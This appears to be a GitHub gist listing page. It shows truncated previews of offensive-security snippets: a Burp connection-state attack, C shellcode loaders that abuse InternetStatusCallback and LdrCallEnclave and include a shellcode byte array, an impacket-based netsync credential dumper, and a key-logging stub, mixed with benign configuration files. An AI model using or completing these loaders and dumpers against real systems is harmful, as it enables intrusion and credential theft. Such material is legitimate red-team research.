D@rkR4y. darkr4y

@albinowax
albinowax / connection-state-attack.bambda
Created October 16, 2025 13:24
Connection state attack Custom Action for Burp Repeater
// For context check out https://portswigger.net/web-security/host-header/exploiting#connection-state-attacks
var connectionId = utilities().randomUtils().randomString(8);
var options = RequestOptions.requestOptions().withConnectionId(connectionId).withHttpMode(HttpMode.HTTP_1);
// Send a simple GET / HTTP/1.1 to the target as the precursor request
var url = requestResponse.request().url();
var precursorRequest = HttpRequest.httpRequestFromUrl(url);
precursorRequest = precursorRequest.withPath("/").withHeader("Connection", "keep-alive");
// Send the attack in the repeater, and update the response pane
@whokilleddb
whokilleddb / JasonToddIsTheBestRobin.c
Created August 21, 2025 22:51
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
@whokilleddb
whokilleddb / enclave.c
Created August 3, 2025 21:35
Run shellcode using LdrCallEnclave
#include <stdio.h>
#include <windows.h>
// Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12
// Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll
EXTERN_C NTSYSAPI
NTSTATUS
NTAPI LdrCallEnclave(
_In_ PENCLAVE_ROUTINE Routine,
@hemashushu
hemashushu / configuration.nix
Created May 5, 2025 15:05
NixOS configuration reference 2025-05
# Edit this configuration file to define what should be installed on
# your system. Help is available in the configuration.nix(5) man page
# and in the NixOS manual (accessible by running ‘nixos-help’).
{ config, pkgs, lib, ... }:
{
imports = [
# Include the results of the hardware scan.
./hardware-configuration.nix
@ThePirateWhoSmellsOfSunflowers
ThePirateWhoSmellsOfSunflowers / netdumper.py
Last active July 1, 2025 14:39
This script performs a netsync attack. No SMB involved
from impacket.dcerpc.v5 import epm, rpcrt, transport, nrpc, samr
from impacket.uuid import bin_to_uuidtup
from impacket.crypto import SamDecryptNTLMHash
from impacket.nt_errors import STATUS_MORE_ENTRIES
from impacket.dcerpc.v5.rpcrt import DCERPCException
from binascii import unhexlify, hexlify
from random import randbytes
import sys
import argparse
@freefirex
freefirex / setup.sh
Created February 14, 2025 19:18
softether vpn setup script
#!/bin/bash
if [ $(id -u) -ne 0 ]; then
echo "This script must be run as root"
exit
fi
# Function to prompt for input and ensure it's not blank (except for domain)
prompt_input() {
local var_name="$1"
@devanshbatham
devanshbatham / GitHub-Actions-Attack-Vectors.md
Last active March 15, 2025 21:41
GitHub Actions Attack Vectors
Security Issue Trigger
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "winmm.lib")
void Nothing(WORD wKey)
{
}
void PrintKey(WORD wKey)
### USAGE:
###
### GetTracelogProviderSecurity.ps1 (to get all provider info)
###
### GetTracelogProviderSecurity.ps1 -ProviderName f2e68291-2367-5d51-3488-46f7a0e3f2cf
### (to get the info for 1 provider guid)
##
#
# Provider: f2e68291-2367-5d51-3488-46f7a0e3f2cf
# Control Flags: 45076
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.